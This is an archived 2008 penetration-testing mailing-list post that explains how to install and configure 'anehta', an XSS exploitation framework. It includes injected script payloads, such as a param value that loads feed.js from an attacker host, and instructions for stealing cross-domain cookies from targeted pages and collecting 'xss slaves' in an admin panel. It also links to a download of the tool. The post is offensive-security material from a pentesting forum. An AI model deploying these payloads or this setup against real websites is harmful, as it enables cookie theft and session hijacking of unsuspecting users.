Penetration Testing mailing list archives

Re: Exploiting XSS

From: xsp <xisigr () gmail com>
Date: Mon, 8 Dec 2008 09:21:20 +0800

=== Enviroment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS


=== Install & Configure ===
1. Decompress all the files in a directory on your server
2. Make sure your directory has the write permission.
3. Modify $U as username and $P as password in
"server/class/auth_Class.php" file.
   Default username is "admin" and default password is "123456".
4. If you want to send mail, modify "server/mail.php" file to your own
mail server or mailbox.


=== Quick Start ===
1. Login and turn to the Configure tab.
2. Input the "anehtaurl" as the url where your anehta is.
   For example: "http://www.a.com/anehta";.
3. You should also input the boomerang src and boomerang target.
   boomerang src is usually the same page where you put your feed.js is.
   For example: boomerang src maybe:
"http://www.b.com/xssed.html?param=<script
src=http://www.a.com/anehta/feed.js></script>".

   boomerang target must be the page where you want to steal cross
domain cookie.
   For example: boomerang target maybe:
"http://www.alimafia.com/xssDemo.html#&apos;><script
src=http://www.a.com/anehta/feed.js></script><'".

   You can modify feed.js to cancel the xcookie module if you do not
want to use boomerang.
   But you must always set boomerang src and target values when you
modify in the configure tab.

4. After modified configure, simply load feed.js as a external script
to where your xss page is.
   There is also a demo page in the directory which is "demo.html"

5. Refresh the admin.php, and you may see some changes if your xss slave coming.


CODE:
http://anehta.googlecode.com/files/anehta-v0.6.0fixed.zip

DEMO:
http://www.secwiki.com/anehta
http://www.secwiki.com/anehta/demo.html



--
xushaopei

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now

www.cenzic.com/landing/trends-report
------------------------------------------------------------------------

Current thread:

Exploiting XSS Whitehat (Dec 03)
- RE: Exploiting XSS Baykal, Adnan (CSCIC) (Dec 03)
  - Re: Exploiting XSS Anthony Cicalla (Dec 05)
  - Re: Exploiting XSS NeZa (Dec 05)
  - Re: Exploiting XSS Durga Prasad Adusumalli (Dec 05)
  - Re: Exploiting XSS Danilo Nascimento (Dec 05)
- Re: Exploiting XSS Adriel T. Desautels (Dec 05)
  - Message not available
    - Re: Exploiting XSS Adriel T. Desautels (Dec 05)
    - Re: Exploiting XSS Paul Melson (Dec 07)
    - Re: Exploiting XSS Adriel T. Desautels (Dec 07)
    - Re: Exploiting XSS xsp (Dec 07)
- Re: Exploiting XSS Guy Mizrahi (Dec 05)
- Re: Exploiting XSS Morning Wood (Dec 05)
- Re: Exploiting XSS Ti (Dec 12)
- <Possible follow-ups>
- Re: Exploiting XSS Ulisses Castro (thebug) (Dec 03)
- Re: Exploiting XSS anj (Dec 08)